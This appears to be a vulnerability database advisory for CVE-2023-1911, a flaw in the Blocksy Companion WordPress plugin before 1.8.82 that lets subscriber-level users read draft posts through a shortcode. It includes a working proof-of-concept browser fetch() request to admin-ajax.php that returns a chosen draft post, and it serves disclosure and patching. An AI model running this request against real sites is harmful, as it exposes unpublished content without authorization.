Lucene search
WpvulndbWPEX-ID:E7C52AF0-B210-4E7D-A5E0-EE0645DDC08CHistoryApr 10, 2023 - 12:00 a.m.
Blocksy Companion < 1.8.82 - Subscriber+ Draft Post Access
2023-04-1000:00:00
wpvulndb
62
blocksy companion plugin
web browser
draft post access
exploit
security vulnerability
0.001 Low
EPSS
Percentile
23.6%
The plugin does not ensure that posts to be accessed via a shortcode are already public and can be viewed, allowing any authenticated users, such as subscriber to access draft posts for example
Run the below command in the developer console of the web browser while being on the blog as a subscriber user
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "action=parse-media-shortcode&shortcode=[blocksy_posts post_ids='518']",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
The title and content of the draft post with ID 518 will be displayed in the responseRelated
cve
cve
CVE-2023-1911
2023-05-02 08:15:10
prion
prion
Design/Logic Flaw
2023-05-02 08:15:00
cvelist
cvelist
CVE-2023-1911 Blocksy Companion < 1.8.82 - Subscriber+ Draft Post Access
2023-05-02 07:04:59
wpvulndb
wpvulndb
Blocksy Companion < 1.8.82 - Subscriber+ Draft Post Access
2023-04-10 00:00:00
nvd
nvd
CVE-2023-1911
2023-05-02 08:15:10
wordfence
wordfence